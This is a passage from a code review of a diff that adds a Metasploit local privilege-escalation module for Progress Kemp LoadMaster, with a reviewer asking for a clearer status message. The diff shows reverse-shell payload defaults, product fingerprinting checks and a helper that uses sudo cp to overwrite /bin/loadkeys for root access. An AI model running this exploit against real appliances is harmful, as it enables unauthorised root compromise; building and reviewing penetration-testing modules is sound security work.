modules/exploits/linux/local/progress_kemp_loadmaster_sudo_privesc_2024.rb

```diff
@@ -0,0 +1,161 @@
+          auto-elevate.  This module overwrites the /bin/loadkeys file with another
+          executable.
+        },
+        'Author' => [
+          'Dave Yesland with Rhino Security Labs',
+          'bwatters-r7' # module,
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['URL', 'https://rhinosecuritylabs.com/research/cve-2024-1212unauthenticated-command-injection-in-progress-kemp-loadmaster/'],
+          ['URL', 'https://kemptechnologies.com/kemp-load-balancers']
+        ],
+        'DisclosureDate' => '2024-03-19',
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE ],
+          'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK],
+          'Reliability' => [ REPEATABLE_SESSION ]
+        },
+        'SessionTypes' => ['shell', 'meterpreter'],
+        'Platform' => ['unix', 'linux'],
+        'Targets' => [
+          [
+            'Dropper',
+            {
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :dropper,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp'
+              }
+            }
+          ],
+          [
+            'Command',
+            {
+              'Arch' => [ARCH_CMD],
+              'Type' => :command,
+              'Payload' =>
+                {
+                  'BadChars' => "\x27",
+                  'Compat' =>
+                    {
+                      'PayloadType' => 'cmd',
+                      'RequiredCmd' => 'generic gawk telnet ssh echo'
+                    }
+                },
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse'
+              }
+            }
+          ]
+        ],
+        'Privileged' => true
+      )
+    )
+    register_options([
+      OptString.new('TARGET_BINARY', [true, 'The path for a binary file that has permission to auto-elevate.', '/bin/loadkeys']),
+      OptString.new('WRITABLE_DIR', [ true, 'A directory where we can write files', '/tmp' ])
+    ])
+  end
+
+  def check
+    score = 0
+    score += 1 if read_file('/usr/wui/index.js').include?('KEMP')
+    score += 1 if read_file('/etc/motd').include?('Kemp LoadMaster')
+    score += 1 if exists?('/usr/wui/eula.kemp.html')
+    vprint_status("Found #{score} indicators this is a KEMP product")
+    return CheckCode::Detected if score > 0
+
+    return CheckCode::Safe
+  end
+
+  def verify_copy(src, dest, elevate)
+    orig_file_hash = file_remote_digestmd5(src)
+    vprint_status("Moving #{src} to #{dest}")
+    if elevate
+      output = cmd_exec("sudo /bin/cp '#{src}' '#{dest}'")
+    else
+      output = cmd_exec("/bin/cp '#{src}' '#{dest}'")
+    end
+    return true if file_remote_digestmd5(dest) == orig_file_hash
+
+    print_bad("Copy failed - #{output}")
+    false
+  end
+
+  def execute_dropper(target_binary, binary_rename, temp_payload_path)
+    vprint_status('Execute dropper')
```

Comment:
Can you change this to something more descriptive in the context of the module output?

Maybe 
```suggestion
    vprint_status("Writing payload to #{temp_payload_path}")
```